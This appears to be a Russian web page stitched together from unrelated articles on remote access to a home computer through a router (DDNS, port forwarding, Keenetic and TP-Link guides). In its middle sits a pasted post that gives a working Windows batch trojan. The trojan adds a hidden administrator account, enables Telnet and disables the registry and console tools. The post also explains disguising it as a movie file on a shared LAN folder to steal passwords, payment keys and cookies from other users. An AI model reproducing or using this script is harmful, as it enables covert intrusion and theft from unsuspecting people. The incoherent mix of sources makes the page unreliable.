Нажмите "Enter", чтобы перейти к содержанию

Как получить доступ к компьютеру через роутер: Как получить доступ к компьютеру через роутер

Содержание

Как получить доступ к компьютеру через роутер

Удаленный доступ к домашнему компьютеру, введение в домашние сети, часть 9

Примечание автора: эта статья «Удаленный доступ к домашнему компьютеру — часть продолжающейся серии «Введение в домашние сети». Для чтения других частей, проверьте связанные истории.

Удаленный доступ к домашнему компьютеру — быстрый способ

Есть кстати более простые и быстрые варианты доступа на домашний компьютер. Я перечислю их ниже:

  1. TeamViewer. Достаточно установить эту программу. И при установке выбрать галочку что установить его как сервер и вы хотите удаленно управлять этим компьютером. Особых настроек не требуется, достаточно задать пароль.
  2. Ammy Admin — тоже неплохая программа — работает аналогично ТимВьюверу
  3. AnyDesk — в настоящий момент пользуюсь ей. Очень удобна чтобы заходить на другие ПК.

Эти программы используют свой облачный прокси, так что вам не нужен белый IP для того, чтобы подключиться к домашнему ПК.

Тут я описал простые и быстрые способы попасть в домашний ПК или ноутбук. А дальше расскажу как организовать это на примере роутера. Это более сложно, правда и возможностей больше.

Удаленный доступ к домашнему компьютеру

Если Вы следили за этой серией, то Вы уже наверняка знаете что я уже обращал Ваше внимание на LAN и WAN порты на маршрутизаторах в части 1 этой серии. И теперь, я расскажу Вам, как Вы можете использовать эту информацию чтобы правильно организовать удаленный доступ к домашнему компьютеру. Например, если Вы знаете, как использовать встроенную функцию Windows «Удаленный рабочий стол», чтобы управлять компьютером из другой комнаты Вашего дома, как насчет того, чтобы организовать подобный доступ с любой точки мира, и спасти себя от необходимости платить за различные службы, такие как LogMeIn или GotoMyPC?

Связанные истории:

Удаленный доступ к домашнему пк — как правильно настроить

Все это возможно, если Вы знаете, как сконфигурировать Ваш домашний маршрутизатор.

Чтобы это сделать, необходимо понять несколько вещей, таких как WAN, LAN, Динамический DNS и Перенаправление портов (иначе Виртуальный сервер). С одной стороны это может показаться непосильной и технически сложной задачей, с другой стороны это довольно просто, если Вы знакомы с веб-интерфейсом маршрутизатора.

И на самом деле, это позволит Вам интересно провести один из выходных дней, и в итоге вы получите неплохую пользу. Просто удостоверьтесь, что Вы всегда сохраняете параметры настройки своего маршрутизатора на свой ПК, прежде чем внести любые изменения.

Получить доступ к Вашему домашнему компьютеру удаленно гораздо проще, чем Вы возможно, думали.

Основные понятия удаленного доступа

WAN

WAN означает Глобальная сеть и является IP-адресом, данным Вам Интернет-провайдером. Этот адрес всегда будет уникальным в Интернете. Дома, когда у Вас есть домашняя сеть с несколькими устройствами, такими как планшеты, компьютеры, и т.д., IP-адрес WAN присвоен Вашему маршрутизатору, что объясняет, почему у всех маршрутизаторов есть WAN (или Интернет) порт.

Это — порт, которому присвоен уникальный IP адрес WAN. Другими словами, адрес WAN уникален для каждой домашней (или офисной) сети. В большинстве случаев, дома или офисе, компьютеру нет необходимости использовать IP-адрес WAN, который присваивается маршрутизатору.

Примечание: здесь идет речь об IPv4, в то время как IPv6 уже давно доступен, фактически все Интернет-приложения и службы потребительского класса все еще используют или поддерживают IPv4, и в ближайшем обозримом будущем так оно и будет.

LAN

У каждого устройства, например такого как компьютер, чтобы соединиться с маршрутизатором (и оттуда получить доступ в Интернет), должен быть свой собственный IP-адрес. Этот IP-адрес — LAN (или локальный) адрес, который маршрутизатор присвоил подключенным устройствам с помощью протокола DHCP. Маршрутизатор оставляет IP WAN адрес для себя и затем раздает свое Интернет-подключение всем устройствам, соединенным с ним. Роутер делает это с помощью функции под названием NAT (или преобразование сетевых адресов). Вы не нужно сильно углубляться в NAT — это — просто технология, предназначенная для экономии IP-адресов IPv4. С помощью NAT, домашний маршрутизатор может использовать всего один IP-адрес WAN, чтобы раздать Интернет максимум 254 устройствам.

Чтобы понять различие между адресом WAN и адресом LAN, просто представьте себе, что WAN это название улицы жилого дома, а LAN — номер квартиры в том здании. У различных квартир в отдельных зданиях могут быть одинаковые номера. Но названия их улиц (WAN) всегда уникальны.

Динамический DNS

Если Вы сейчас дома, зайдите на whatismyipaddress.com, и вы увидите Ваш IP-адрес WAN. Теперь, если Вам понадобиться получить удаленный доступ к вашей домашней локальной сети, Вы можете использовать этот адрес. Фактически, если у Вас включена функция удаленного управления на Вашем маршрутизаторе, то именно этот IP-адрес и нужно использовать, чтобы получить доступ к Вашему маршрутизатору из вне.

Примечание: Из соображений безопасности, если Вы решили включить функцию удаленного управления своим домашним маршрутизатором. Она обычно находится в разделе «Администрирование» или «Система» веб-интерфейса маршрутизатора. Так же проверьте, что Вы сменили пароль администратора по умолчанию на что-то более безопасное. И кроме того подумайте о смене номера порта, через который Вы получаете доступ (номер порта по умолчанию 8080). Кроме того, было бы неплохо поменять номера портов по умолчанию для известных служб/приложений.

Теперь зная, что IP-адрес WAN это не просто так. И вдобавок ко всему, большинство домашних тарифных планов идет с динамическим IP-адресом WAN, который периодически изменяется. Лучше перевести тот адрес во что-то постоянное и простое для запоминания. Для этого можно воспользоваться службой Динамический DNS (DynDNS или DDNS). Многие производители, такие как Asus или Synology, предлагают эту услугу бесплатно и ее можно активировать в веб интерфейсе. Также, Вы всегда можете использовать DynDNS.org.

Dynamic DNS от Asus.

Служба DynDNS позволяет Вам создавать пользовательский домен. Например такой как myhome.homefpt.net. Это даст вам что-то более простое для запоминания, чем непонятные строки чисел и точек. Имя этого домена должно быть уникальным. И если кто то уже занял то имя которое Вы выбрали, Вам придется придумать что-нибудь новое. После того, как пользовательский домен создан, есть несколько способов, с помощью которых Вы можете привязать его к IP-адресу WAN. 1 — запустив клиент DynDNS на компьютере в Вашей домашней сети, затем присоединив его к серверу NAS в домашней сети. 2 — присвоив его домашнему маршрутизатору. Большинство, если не все домашние маршрутизаторы, поддерживают функцию Динамический адрес DNS. И им можно управлять, используя веб-интерфейс Вашего маршрутизатора.

DynDNS — это удобно

Например, если Вы выбрали myhome.homefpt.net в качестве Вашего DynDNS адреса и используете 8080 порт. Это для управления маршрутизатором, когда Вы находитесь вдали от дома. Вы можете просто набрать в браузере myhome.homefpt.net:8080, чтобы получить доступ к интерфейсу Вашего маршрутизатора. Это работает практически со всеми домашними маршрутизаторами, за исключением Apple.

Подключение с помощью правильно настроенной службы Dynamic DNS.

Перенаправление портов для удаленного доступа

Теперь, когда Вы можете получить доступ к своему домашнему маршрутизатору. И следующим шагом будет пройти мимо Вашего маршрутизатора. И получить доступ к определенному устройству в Вашей домашней сети. Для этого Вам необходимо активировать службу, которая отвечает за удаленный доступ, на Вашем компьютере или ноутбуке. (т.е. удостоверьтесь, что опция Remote Desktop активирована на компьютере). И затем сконфигурируйте маршрутизатор, чтобы перенаправить порт этой службы на Ваш компьютер. У большинства служб есть свой собственный порт по умолчанию. Номером порта по умолчанию для удаленного управления маршрутизатором является 8080. Об этом я упоминал выше. Точно так же есть и порт по умолчанию для Службы удаленного рабочего стола — 3389.

Перенаправление портов или виртуальный серве

Во многих маршрутизаторах функцию перенаправления портов также вызывают Виртуальным сервером. Для того чтобы это настроить, необходимо указать в локальный IP-адрес компьютера. Так же номер порта (или диапазон портов). И сохранить конфигурацию. Например, если у Вашего компьютера Windows будет локальный IP-адрес 192.168.1.100, то перенаправление порта 3389 на этот IP-адрес позволит Вам управлять им. Например используя Удаленный рабочий стол из любой точки мира. Ве с помощью DynDNS адреса, закрепленного за Вашим маршрутизатором. Обратите внимание на то, что программное обеспечение Клиента удаленного рабочего стола доступно для всех версий Windows. И загружаемо для Mac ов. Но только версии Windows, такие как Pro, Business, или Ultimate editions могут использоваться в качестве цели для создания соединения Удаленного рабочего стола.

Вот типичный пример Перенаправления портов для Удаленного рабочего стола в веб-интерфейсе маршрутизатора.

С помощью DynDNS, Вы можете связать много служб из Вашего дома. Вот несколько портов по умолчанию и их службы: 80 (HTTP, для веб-сервера). 3389 (Удаленный рабочий стол), и 21 (FTP, для Ftp-сервера).

Обратите внимание на то, что локальный IP компьютера (LAN) адрес может также измениться после перезапуска. Можно настроить так, чтобы он остался тем же. Для этого нужно использовать IP (или DHCP) функцию «Reservation». Она позволяет закреплять полученные IP адреса за конкретными устройствами.

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCUSOFTWAREPOLICIESMicrosoftMMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%system32compmgmt.msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCUSOFTWAREPOLICIESMicrosoftMMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%system32compmgmt.msc >nul
Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCUSOFTWAREPOLICIESMicrosoftwindowsSystem” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

NOTE: В данной статье показана настройка версий ОС NDMS 2.11 и более ранних. Настройка актуальной версии ПО представлена в статьях «Переадресация портов» и «Пример настройки подключения к домашнему компьютеру по RDP».

Для организации удаленного доступа из глобальной сети к компьютеру, подключенному к интернет-центру (роутеру), существует множество способов. Один из них — подключение к рабочему столу при помощи терминальных программ для удаленного управления компьютерами. Самые распространенные из них — Remote Desktop (Дистанционное управление рабочим столом), являющаяся терминальной службой ОС Windows (входит в состав операционной системы), Radmin и VNC.

Для роутера важно только указать правильный номер порта, который использует программа для удаленного управления компьютерами. Например, для службы Remote Desktop по умолчанию используется номер порта TCP 3389, для программы Radmin используется номер порта 4899, а для программы VNC — номер порта 5900. Если вы не знаете, какой номер порта используется в программе, обратитесь за информацией на сайт: http://www.portforward.com/cports.htm. Здесь вы найдете список наиболее популярных программ и номера портов, которые они используют. Если вы не нашли нужный сервис, то номер порта вашего приложения вы можете узнать из документации его разработчика или настроек программы.

Ниже рассмотрим пример настройки интернет-центра Keenetic для возможности удаленного подключения к компьютеру в локальной домашней сети при помощи Remote Desktop (находится в ОС Windows в меню Программы > Стандартные > Связь > Подключение к удаленному рабочему столу). При использовании других программ (Radmin, VNC и т.п.) настройки роутера будут отличаться только номером порта в настройках NAT и в настройках NAT.

Внимание! Для подключения из Интернета необходимо, чтобы на WAN-интерфейсе Keenetic’а был установлен «белый» IP-адрес (внешний глобальный IP-адрес) сети Интернет. Для того чтобы проверить, является ли ваш адрес таковым, можно воспользоваться сервисом myip.ru (или любым подобным). Вам будет показан IP-адрес, под которым был произведен запрос на сайт; если он совпадает с IP-адресом, выданным на WAN-интерфесе интернет-центра, значит, вам выдан «белый» IP-адрес. Посмотреть, какой IP-адрес используется на WAN-интерфейсе интернет-центра, можно в веб-конфигураторе в меню Системный монитор. Информацию про «белые» и «серые» IP-адреса вы найдете в статье: «В чем отличие «белого» и «серого» IP-адреса?»

Далее рассмотрим пример настройки интернет-центра Keenetic c микропрограммой NDMS V2.

Подключитесь к веб-конфигуратору устройства, зайдите в меню Безопасность > Трансляция сетевых адресов (NAT) и нажмите кнопку Добавить правило для создания нового правила проброса порта.

Внимание! Необходимо правильно указать значение поля Интерфейс. В зависимости от того, использует ли ваш провайдер авторизацию (PPPoE, L2TP или PPTP), значение этого поля может быть различным. Если авторизация у провайдера не используется, следует всегда выбирать интерфейс Broadband connection (ISP). Если провайдер использует PPPoE для доступа в Интернет, то следует выбирать соответствующий интерфейс PPPoE.

В поле Протокол нужно указать протокол из списка предустановленных, который использует программа Remote Desktop (в нашем примере порт 3389) и который будет использован при пробросе порта.

В поле Перенаправить на адрес выберите нужный хост из списка зарегистрированных устройств, на который будет осуществляться проброс порта (в нашем примере это 192.168.1.39). Также вы можете указать IP-адрес хоста локальной сети вручную, выбрав значение другой.

После заполнения нужных полей нажмите кнопку Сохранить.

Внимание! Настройку межсетевого экрана для проброса порта производить не нужно, т.к. при использовании правила трансляции адресов интернет-центр самостоятельно открывает доступ по указанному порту в Firewall.

Так как при настройке нужно указать IP-адрес компьютера домашней сети, он должен иметь фиксированный IP-адрес, который может быть назначен вручную или автоматически от интернет-центра. В последнем случае нужно закрепить (зафиксировать) IP-адрес за устройством, что позволит компьютеру всегда получать один IP-адрес от DHCP-сервера интернет-центра. Если не закрепить IP-адрес, то он потенциально может изменяться при каждом включении компьютера.

Перейдите в меню Домашняя сеть на вкладку Устройства, и щелкните по записи нужного устройства. Откроется окно Регистрация устройства в сети, в котором установив галочку в поле Постоянный IP-адрес и нажмите кнопку Зарегистрировать.

После того как вы закрепили IP-адрес, компьютер будет постоянно получать один и тот же IP-адрес от интернет-центра.

Таким образом, вы из Интернета сможете с помощью программы/службы для удаленного управления компьютерами подключиться к рабочему столу компьютера домашней сети, используя WAN IP-адрес интернет-центра Keenetic в глобальной сети. Узнать WAN IP-адрес интернет-центра можно в веб-конфигураторе на экране Системный монитор > Система в разделе Действующее подключение к Интернету в строке Адрес IPv4. Однако WAN IP-адрес может назначаться провайдером динамически, а значит, будет постоянно меняться. В этом случае мы рекомендуем использовать функцию Динамического DNS – DyDNS. Настройка и использование сервиса динамического DNS от No-IP в интернет-центре серии Keenetic c микропрограммой NDMS V2 представлена в статье: «Настройка и использование сервиса динамического DNS от No-IP»

Если проброс портов по какой-то причине не заработал, обратитесь к статье «Что делать, если не работает проброс портов?».

Пользователи, считающие этот материал полезным: 30 из 38

Как получить доступ к компьютеру через роутер


Как настроить удалённый доступ к рабочему компьютеру, подключённому к роутеру TP-Link?

В условиях глобального распространения COVID-19 работа из дома для многих становится реальностью. Если ваш офисный компьютер подключён к роутеру TP-Link, вы можете настроить удалённый доступ и продолжить работать с офисными файлами и приложениями, а также получить доступ к принтеру и сетевому хранилищу, находясь дома.

В этой статье мы кратко расскажем о трёх способах настроить удалённое подключение с помощью «Подключения к удалённому рабочему столу» и виртуального сервера в роутерах TP-Link, а также с помощью OpenVPN и PPTP VPN. Обратите внимание, что указанные ниже изображения могут отличаться в зависимости от операционной системы вашего компьютера.

Удалённый рабочий стол + виртуальный сервер

Данный способ подразумевает использование «удалённого рабочего стола» и функции виртуального сервера. Он прост в настройке, но менее безопасен, потому что делает ваш офисный сервер видимым из интернета.

Он также требует, чтобы ваша офисная сеть имела широкополосное подключение к интернету с публичным IP-адресом. Перед настройкой виртуального сервера рекомендуется настроить услугу Dynamic DNS, например, TP-Link DDNS.

Чтобы настроить удалённый доступ:
  1. На офисном роутере добавьте отображение виртуального сервера на TCP порту 3389 (порт протокола удаленного рабочего стола).

2. Разрешите все удалённые подключения на вашем компьютере

Чтобы получить доступ к вашему рабочему компьютеру из дома:

Подключитесь к рабочему компьютеру с домашнего. Для этого нажмите комбинацию клавиш Win +R, в открывшемся меню программы «Выполнить» укажите mstsc и нажмите клавишу Enter. Вы увидите указанное ниже окно.

VPN (OpenVPN / PPTP VPN)

При VPN-подключении офисная сеть будет работать как сервер, а ваш домашний компьютер сможет обращаться к ней через роутер, который будет выступать в качестве шлюза с VPN-сервером. Этот способ является более безопасным, поскольку VPN обеспечивает шифрование данных и каналов управления.

Перед тем, как включить VPN-сервер, рекомендуется настроить службу динамического DNS, например, TP-Link DDNS. Не забудьте синхронизировать системное время роутера с интернетом.

Популярными способами настройки VPN-подключений являются OpenVPN и PPTP VPN. Вы можете выбрать любой способ в соответствии с вашими задачами. Если вы используете OpenVPN сервер, вам потребуется установить клиентскую утилиту OpenVPN на каждом домашнем компьютере, который вы планируете использовать для доступа к вашему рабочему компьютеру.

OpenVPN
Чтобы настроить удаленный доступ:
  1. На офисном роутере сгенерируйте сертификат, настройте сервер OpenVPN, а затем экспортируйте файл конфигурации (client.ovpn).

2. Разрешите все удалённые подключения на вашем компьютере.

Чтобы получить доступ к рабочему компьютеру из дома:
  1. На домашнем компьютере загрузите и установите клиентскую утилиту OpenVPN:

Как получить доступ к маршрутизатору удаленно

Доступ к домашнему маршрутизатору изнутри сети очень прост. Просто введите IP-адрес вашего маршрутизатора (обычно 192.168.1.1 или 192.168.0.1) в веб-браузере. Но как насчет удаленного доступа к маршрутизатору?

Теперь, прежде чем мы подойдем к этому, давайте рассмотрим некоторые причины, по которым вы можете захотеть это сделать.

  1. Ваши родители регулярно просят вас исправить их Интернет, но вы не живете с ними
  2. Вы хотите проверить, играют ли дети дома в игры на своем компьютере, вместо того, чтобы делать уроки.
  3. Вы подозреваете, что соседи болтают по вашему Wi-Fi, когда вас нет дома
  4. И, наконец, вы можете подключить внешний жесткий диск к маршрутизатору и получить к нему доступ из любого места

Связанные: 5 способов выгнать людей из вашей сети WiFi

Почему бы не использовать приложения для удаленного рабочего стола, такие как TeamViewer?

Хотя вы также можете получить доступ к своему маршрутизатору с помощью таких приложений, как TeamViewer, вам необходимо постоянно держать компьютер включенным у себя дома. Это непрактично, если вы отсутствуете более пары дней.Но роутеры всегда включены, дома вы или нет. Кроме того, вам не нужно устанавливать дополнительное программное обеспечение. Все, что вам нужно, это веб-браузер, и вы можете получить доступ к своему маршрутизатору из любой точки мира. Посмотрим, как это работает.

Если вы хотите получить доступ к маршрутизатору изнутри сети; все, что вам нужно сделать, это ввести IP-адрес маршрутизатора в веб-браузере. Точно так же, чтобы получить доступ к вашему маршрутизатору извне, вам нужно ввести свой общедоступный IP-адрес, а затем порт удаленного управления № i.е. 8080. Итак, если ваш общедоступный IP-адрес 74.12.168.14, вам нужно будет ввести 74.12.168.14:8080 в веб-браузере.

Но тут две проблемы

1. В целях безопасности на каждом маршрутизаторе по умолчанию функция удаленного управления отключена. Итак, вам нужно включить его вручную на маршрутизаторе.

2. Большинству домашних пользователей назначается динамический IP-адрес, что означает, что каждый раз, когда вы перезагружаете маршрутизатор, ваш общедоступный IP-адрес изменяется. Итак, нам нужно найти способ обойти проблему динамического IP-адреса.И для этого мы будем использовать службы динамического DNS, такие как Dyn DNS или NoIp.

Поскольку каждый маршрутизатор отличается, шаги по включению удаленного управления и настройке динамического DNS будут несколько разными для каждого маршрутизатора. Однако основной принцип остается прежним. В этой статье я покажу вам это на Netgear Nighthawk R7000 с пользовательской прошивкой DD-WRT. Давайте будем

Как получить доступ к маршрутизатору удаленно

Часть 1. Включите удаленный доступ

Включить удаленный общий доступ на маршрутизаторе очень просто.Все, что вам нужно сделать, это ввести IP-адрес маршрутизатора или адрес шлюза по умолчанию в веб-браузере. Далее введите свой логин и пароль. Теперь, когда вы находитесь на веб-портале маршрутизатора, ищите опцию Remote Management . Некоторые маршрутизаторы называют это удаленным доступом, и он обычно находится в разделе A dvanced Settings .

На маршрутизаторе Netgear эту опцию можно найти в разделе «Настройки»> «Удаленное управление».

На маршрутизаторе Dlink найдите Инструменты> Администрирование> Включить удаленное управление

На маршрутизаторе Linksys перейдите в Администрирование> Удаленное управление

На TP = Link router вы можете найти эту опцию в Security> Remote Management

Поскольку вы предоставляете общий доступ к веб-порталу маршрутизатора удаленно, рекомендуется изменить номер порта по умолчанию.с 8080 на что-то другое. Также убедитесь, что вы не используете учетные данные по умолчанию. Измените его на что-то сложное, иначе любой может войти в вашу сеть с помощью атаки грубой силы.

Часть 2: Настройка динамического DNS

Поскольку у большинства из нас есть динамический общедоступный IP-адрес, он изменится в ближайшие несколько дней. Итак, давайте исправим это, настроив динамический DNS. Но перед этим нужно понять, что такое Dynamic DNS или DDNS на самом деле.

Давайте возьмем эту аналогию.Если я буду часто менять свой почтовый адрес, я не получу письма вовремя. Правильно? Поэтому вместо того, чтобы сообщать всем свой адрес, я дам им постоянный адрес моего друга. Теперь мой друг будет получать всю мою почту, и я буду сообщать ему мой последний адрес. Итак, теперь он может легко переслать мне почту.

Итак, этот динамический DNS похож на друга посередине. Когда вы регистрируетесь в их службе, вы должны связать свой динамический общедоступный IP-адрес с доменным именем. И вы можете использовать это фиксированное доменное имя вместо своего общедоступного IP-адреса.И они сделают работу по обновлению вашего IP-адреса в фоновом режиме.

Сейчас существует множество провайдеров динамического DNS. Некоторые бесплатные, некоторые платные. Лучший способ определить, какую службу выбрать, — это проверить, какая служба поддерживается на вашем маршрутизаторе. Выполните следующие действия.

1. Войдите в свой маршрутизатор и найдите параметр с надписью Dynamic DNS.

Если его там нет, вы можете загрузить программу обновления IP у любого поставщика динамических DNS. И поставить на компьютер, которым часто пользуются.Но почти каждый маршрутизатор (даже самый дешевый) имеет встроенные параметры динамического DNS, поэтому вам не нужно об этом беспокоиться.

У меня на роутере Netgear установлено специальное ПЗУ под названием dd-wrt. Он поддерживает DDNS и no-IP. Теперь так как оплачивается только первый. Я выберу второй, то есть без IP. Глядя на интерфейс, я могу сказать, что все, что мне нужно, это доменное имя и имя пользователя / пароль.

2. Зайдите на noip.com и создайте бесплатную учетную запись.

3.Затем перейдите на панель управления, там вы найдете опцию Добавить имя хоста. Щелкните по нему. В новом окне введите новый поддомен по вашему выбору и нажмите «Добавить».

4. Теперь скопируйте новое доменное имя и вставьте его в настройки маршрутизатора, а также введите свое имя пользователя и пароль, которые вы использовали для входа в эту службу. И сохраните изменения.

5. Теперь, чтобы получить доступ к домашнему маршрутизатору из удаленного места, введите свое доменное имя, а затем номер порта удаленного управления.Например — techwiser.ddns.net:8080. Если ваши настройки верны, вы увидите экран входа в систему вашего роутера.

Заключительные слова: как получить доступ к маршрутизатору удаленно

Итак, теперь, когда вы настроили DDNS и удаленный доступ на своем маршрутизаторе, вы можете получить к нему доступ из любого места через Интернет. Если у вас старый маршрутизатор, вот несколько советов о том, как увеличить скорость сети на вашем старом Wi-Fi

.

.

Как получить доступ к настройке маршрутизатора домашней сети или консоли

Обновлено: 31.08.2020, Computer Hope

Эта страница предназначена для предоставления пользователю домашней сети общего ресурса о том, как получить доступ к настройке своего маршрутизатора или консоли, чтобы они могли изменить настройки. Из-за того, что сегодня доступно множество различных маршрутизаторов, не все описанные ниже действия могут быть применимы к вам.

Совет

Вы можете пропустить все описанные ниже шаги, попробовав наиболее распространенные адреса IP-маршрутизаторов. Щелкните либо http: // 192.168.1.1, http://192.168.2.1 или http://10.0.0.1, чтобы открыть новое окно в браузере с настройкой маршрутизатора. Если эти ссылки не работают, выполните следующие действия.

Определить адрес маршрутизатора

Прежде чем получить доступ к маршрутизатору, вы должны определить его IP-адрес, выполнив следующие действия.

Пользователи Microsoft Windows
  1. Откройте командную строку Windows.
  2. В командной строке введите: ipconfig и нажмите Enter .См. Отображаемую информацию, аналогичную приведенному ниже примеру.
 ipconfig 
 Ethernet-адаптер Ethernet: DNS-суффикс для конкретного соединения. : computerhope.com. Айпи адрес. . . . . . . . . . . . : 192.168.1.103 Маска подсети . . . . . . . . . . . : 255.255.255.0  Шлюз по умолчанию. . . . . . . . . : 192.168.1.1  
  1. Если у вас несколько сетевых адаптеров, убедитесь, что вы просматриваете раздел Ethernet-адаптер . Адрес шлюза по умолчанию — это IP-адрес маршрутизатора , подключенного к вашему компьютеру.В приведенном выше примере IP-адрес, который мы хотим запомнить, — 192.168.1.1.
Пользователи Linux
Пользователи

Linux могут выполнить те же действия, перечисленные выше для пользователей Windows. Однако вместо использования команды ipconfig в консоли вы захотите использовать команду ip и просмотреть информацию для inet . Например:

 ip a | grep inet 
 inet 127.0.0.1/8 область видимости хоста lo inet6 :: 1/128 хост области inet 192.168.1.17/24 brd 192.168.1.255 глобальная динамическая область действия eth0 inet6 fe77 :: ea9a: 8fbf: fa17: 74b7 / 64 ссылка области 
Несколько маршрутизаторов

Если вы используете несколько маршрутизаторов в вашей сети, убедитесь, что вы используете IP-адрес, соответствующий маршрутизатору, к которому вы хотите получить доступ. Если вы не можете найти маршрутизатор, к которому вы в данный момент подключены, вы можете попробовать выполнить трассировку.

Чтобы выполнить traceroute в Microsoft Windows, введите: tracert computerhope.com . Если вы используете Linux, введите: traceroute computerhope.com . Любая из этих команд обеспечивает вывод, аналогичный приведенному ниже примеру.

 traceroute computerhope.com 
 1 1 мс  

Как вы можете видеть в приведенном выше примере, первые два перехода - это внутренние маршрутизаторы. Если мы хотим посмотреть на маршрутизатор, подключенный к Интернету, адрес, мы запомним адрес 192.168.2.1.

Доступ к роутеру

После того, как вы определили IP-адрес маршрутизатора, к которому хотите получить доступ, откройте окно Интернет-браузера и в адресной строке введите IP-адрес. Итак, если ваш IP-адрес был 192.168.2.1, введите «192.168.2.1» в адресной строке.

